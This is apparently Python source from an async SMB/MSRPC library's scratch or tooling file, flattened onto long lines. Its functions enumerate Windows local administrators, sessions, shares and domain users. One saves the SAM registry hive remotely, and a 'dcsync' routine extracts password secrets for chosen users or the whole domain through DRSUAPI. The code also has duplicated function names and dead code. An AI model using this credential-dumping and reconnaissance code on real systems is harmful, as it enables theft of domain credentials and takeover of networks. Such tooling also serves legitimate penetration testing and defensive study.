async def list_localgroup_members(connection_string, groupname = 'Administrators', out_file = None, json_out = False): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() async with SMBSAMR(connection) as samr: logging.debug('Connecting to SAMR') try: await samr.connect() except Exception as e: logging.exception('Failed to connect to SAMR') #list domain found = False async for domain in samr.list_domains(): #print(domain) if domain == 'Builtin': found = True logging.info('[+] Found Builtin domain') if found == False: raise Exception('[-] Could not find Builtin domain. Fail.') #open domain domain_sid = await samr.get_domain_sid('Builtin') domain_handle = await samr.open_domain(domain_sid) #list aliases found = False target_rid = None async for name, rid in samr.list_aliases(domain_handle): #print(name, rid) if name == groupname: target_rid = rid found = True logging.info('[+] Found %s group!' % name) break if found == False: raise Exception('[-] %s group not found! Fail.' % name) #open alias alias_handle = await samr.open_alias(domain_handle, target_rid) #list alias memebers async for sid in samr.list_alias_members(alias_handle): print(sid) print('Done!')
async def read_file(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() async with SMBFileReader(connection) as reader: await reader.open(filename) data = await reader.read() print(data)
async def filereader_test(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() try: t = SMBDRSUAPI(connection, 'TEST.corp') await t.connect() await t.open() input('open succsess!') await t.get_user_secrets('victim') except Exception as e: import traceback traceback.print_exc() print('Error! %s' % e) return tmpFileName = os.urandom(4).hex() + '.tmp' rreg = SMBRemoteRegistryService(connection) await rreg.save_hive('SAM', tmpFileName) print('Success! Registry file should be in %s' % ('SYSTEM32\\' + tmpFileName)) await rreg.close() return rpctransport = SMBTransport(connection, filename=r'\srvsvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(srvs.MSRPC_UUID_SRVS) resp = await srvs.hNetrShareEnum(dce, 1) print(resp['InfoStruct']['ShareInfo']['Level1']['Buffer']) rpctransport = SMBTransport(connection, filename=r'\wkssvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(wkst.MSRPC_UUID_WKST) resp = await wkst.hNetrWkstaUserEnum(dce, 1) print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']) rpctransport = SMBTransport(connection, filename=r'\wkssvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(wkst.MSRPC_UUID_WKST) resp = await wkst.hNetrWkstaUserEnum(dce, 1) print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
async def list_sessions(connection_string, filename = None, json_out = False): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() async with SMBSRVS(connection) as srvs: logging.debug('Connecting to SAMR') try: await srvs.connect() except Exception as e: logging.exception('Failed to connect to SAMR') async for username, ip_addr in srvs.list_sessions(): print(username, ip_addr) print('Done!')
async def filereader_test(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: try: await connection.login() except Exception as e: print(str(e)) raise e print(connection) srvs = SMBSRVS(connection) await srvs.connect() async for name, share_type, remark in srvs.list_shares(): print(name, share_type, remark)
async def filereader_test(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() samr = SMBSAMR(connection) await samr.connect() async for domain in samr.list_domains(): print('domain: %s' % domain) domain_sid = await samr.get_domain_sid('TEST') print(str(domain_sid)) domain_handle = await samr.open_domain(domain_sid) print(domain_handle) async for username in samr.list_domain_users(domain_handle): print(username) async for groupname in samr.list_domain_groups(domain_handle): print(groupname) async for sid, username in samr.enumerate_users(domain_handle): print(username, sid) user_handle = await samr.open_user(domain_handle, 1106) input(user_handle) async for sid in samr.get_user_group_memberships(user_handle): print(sid) #polling local goup users local_domain_sid = await samr.get_domain_sid('Builtin') domain_handle = await samr.open_domain(local_domain_sid) alias_handle = await samr.open_alias(domain_handle, 544) async for sid in samr.list_alias_members(alias_handle): print(sid)
async def filereader_test(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: #try: # await connection.login() #except Exception as e: # print(str(e)) # raise e results_queue = asyncio.Queue() host_scanner = SMBHostScanner(connection, results_queue=results_queue) await host_scanner.run() while True: res = await results_queue.get() print(type(res)) print(res)
async def dcsync(connection_string, filename=None, target_domain=None, target_users=[], json_out=False): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() async with SMBSAMR(connection) as samr: logging.debug('Connecting to SAMR') try: await samr.connect() except Exception as e: loggign.exception('Failed to connect to SAMR') if target_domain is None: logging.debug('No domain defined, fetching it from SAMR') logging.debug('Fetching domains...') async for domain in samr.list_domains(): if target_domain is None: #using th first available target_domain = domain logging.debug('Domain available: %s' % domain) logging.debug('Using domain: %s' % target_domain) async with SMBDRSUAPI(connection, target_domain) as drsuapi: try: await drsuapi.connect() await drsuapi.open() except: logging.exception('Failed to connect to DRSUAPI!') if len(target_users) > 0: if filename is not None: with open(filename, 'w') as f: for username in target_users: secrets = await drsuapi.get_user_secrets( username) if json_out == True: f.write(json.dumps(secrets.to_dict())) else: f.write(str(secrets)) else: for username in target_users: secrets = await drsuapi.get_user_secrets(username) print(str(secrets)) else: domain_sid = await samr.get_domain_sid(target_domain) domain_handle = await samr.open_domain(domain_sid) if filename is not None: with open(filename, 'w') as f: async for username, user_sid in samr.list_domain_users( domain_handle): secrets = await drsuapi.get_user_secrets( username) if json_out == True: f.write( json.dumps(secrets.to_dict()) + '\r\n') else: f.write(str(secrets)) else: async for username, user_sid in samr.list_domain_users( domain_handle): secrets = await drsuapi.get_user_secrets(username) print(str(secrets)) print('Done!')